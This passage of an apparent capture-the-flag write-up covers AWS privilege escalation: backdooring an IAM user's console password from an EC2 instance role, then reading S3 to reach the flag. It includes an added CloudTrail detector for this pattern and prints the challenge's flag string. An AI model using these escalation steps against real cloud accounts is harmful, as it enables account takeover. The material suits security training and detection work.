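        {"Effect": "Deny", "Action": "iam:CreateAccessKey", "Resource": "*"},
    ],
}]

if __name__ == "__main__":
    print("Escalation methods for current role:", privesc_methods(LIMITED_ROLE_LIKE))
```

The same matching explains why the read-only S3 policies seen later are harmless on their own: none of the listed primitives is an s3: action, so a principal holding only AmazonS3ReadOnlyAccess yields an empty list.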
Log in to the AWS Management Console with the changed password.
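Seen from the account owner's side, these two steps leave a clear trail in CloudTrail: an UpdateLoginProfile call whose caller is the EC2 instance-profile session (assumed-role/limited-role/<instance id>), followed minutes later by a ConsoleLogin for the user whose password was just set. The detector below is an added example, not from the write-up or from pacu; the records it runs over are constructed (the account ID, role and user names are the ones shown above; the instance ID, IP addresses, timestamps and the admin user used as a benign control are made up). It deliberately ignores userAgent, because, as the pacu banner above shows, tools rewrite it to avoid GuardDuty's user-agent based PenTest findings.

```python
import json
import re
from datetime import datetime, timedelta

# IAM calls that hand another principal a credential or a permission.
CREDENTIAL_MUTATIONS = {"UpdateLoginProfile", "CreateLoginProfile", "CreateAccessKey",
                        "AttachUserPolicy", "PutUserPolicy", "AddUserToGroup"}
# EC2 instance-profile sessions are named after the instance: .../assumed-role/<role>/i-xxxx
INSTANCE_SESSION = re.compile(r"^i-[0-9a-f]{8,17}$")


def _ts(event):
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def session_name(identity):
    """Role session name from an assumed-role ARN, or None for other identity types."""
    if identity.get("type") != "AssumedRole":
        return None
    return identity["arn"].rsplit("/", 1)[-1]


def detect(events, login_window=timedelta(hours=1)):
    """Two rules over CloudTrail records in time order:
    1. an instance-profile session (session name = instance id) mutating
       another principal's credentials or permissions;
    2. a ConsoleLogin by a user whose password rule 1 just reset."""
    findings, reset = [], {}
    for e in sorted(events, key=_ts):
        ident = e["userIdentity"]
        sess = session_name(ident)
        if (e["eventSource"] == "iam.amazonaws.com" and e["eventName"] in CREDENTIAL_MUTATIONS
                and sess is not None and INSTANCE_SESSION.match(sess)):
            target = e.get("requestParameters", {}).get("userName")
            findings.append({"rule": "instance-role-credential-mutation", "event": e["eventName"],
                             "actor": ident["arn"], "target": target, "sourceIP": e["sourceIPAddress"]})
            if e["eventName"] in ("UpdateLoginProfile", "CreateLoginProfile") and target:
                reset[target] = (_ts(e), e["sourceIPAddress"])
        elif e["eventName"] == "ConsoleLogin" and ident.get("type") == "IAMUser":
            user = ident.get("userName")
            if user in reset and _ts(e) - reset[user][0] <= login_window:
                findings.append({"rule": "console-login-after-reset", "event": "ConsoleLogin",
                                 "actor": ident["arn"], "target": user, "sourceIP": e["sourceIPAddress"],
                                 "same_source_as_reset": e["sourceIPAddress"] == reset[user][1]})
    return findings


# Constructed CloudTrail records, not logs from the challenge account.
ACCT = "211834306030"
EVENTS = [
    {   # the pacu iam__backdoor_users_password step, as CloudTrail would record it
        "eventTime": "2020-02-08T15:20:03Z", "eventSource": "iam.amazonaws.com",
        "eventName": "UpdateLoginProfile", "sourceIPAddress": "198.51.100.7",
        "userAgent": "aws-cli/1.15.10 Python/2.7.9 Windows/8 botocore/1.10.10",
        "userIdentity": {"type": "AssumedRole",
                         "arn": f"arn:aws:sts::{ACCT}:assumed-role/limited-role/i-0abc123def456789a",
                         "sessionContext": {"sessionIssuer": {"type": "Role", "userName": "limited-role"}}},
        "requestParameters": {"userName": "poorUser"}},
    {   # benign control: a user rotating their own password
        "eventTime": "2020-02-08T14:12:41Z", "eventSource": "iam.amazonaws.com",
        "eventName": "ChangePassword", "sourceIPAddress": "192.0.2.20",
        "userIdentity": {"type": "IAMUser", "userName": "poorUser", "arn": f"arn:aws:iam::{ACCT}:user/poorUser"}},
    {   # benign control: a (made-up) admin user resetting a password from the console
        "eventTime": "2020-02-08T14:30:00Z", "eventSource": "iam.amazonaws.com",
        "eventName": "UpdateLoginProfile", "sourceIPAddress": "192.0.2.21",
        "userIdentity": {"type": "IAMUser", "userName": "admin", "arn": f"arn:aws:iam::{ACCT}:user/admin"},
        "requestParameters": {"userName": "poorUser"}},
    {   # the console login with the backdoored password, from the same source address
        "eventTime": "2020-02-08T15:24:10Z", "eventSource": "signin.amazonaws.com",
        "eventName": "ConsoleLogin", "sourceIPAddress": "198.51.100.7",
        "userIdentity": {"type": "IAMUser", "userName": "poorUser", "arn": f"arn:aws:iam::{ACCT}:user/poorUser"},
        "responseElements": {"ConsoleLogin": "Success"}},
]

if __name__ == "__main__":
    print(json.dumps(detect(EVENTS), indent=2))
```

Rule 1 on its own is worth running regardless of the login correlation: an EC2 instance profile has no legitimate reason to set user passwords or create access keys, so the session name pattern plus the action set gives a low-noise signal even when the credentials are used from the instance itself rather than exfiltrated.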

To check poorUser's permissions, first look at which IAM groups poorUser belongs to.

poorUser belongs to the limiteds3g and limited2 groups. Check the policies attached to each.
The limiteds3g group has AmazonS3ReadOnlyAccess attached.

The limited2 group has a policy attached that permits the Actions shown in the image below.

Since S3 is readable, moving to the S3 console reveals a suspicious S3 bucket.

Found flag.txt!

Downloading it shows the flag.
Flag captured.
hackim20{Hail_RhinoSecurity_labs!!!!}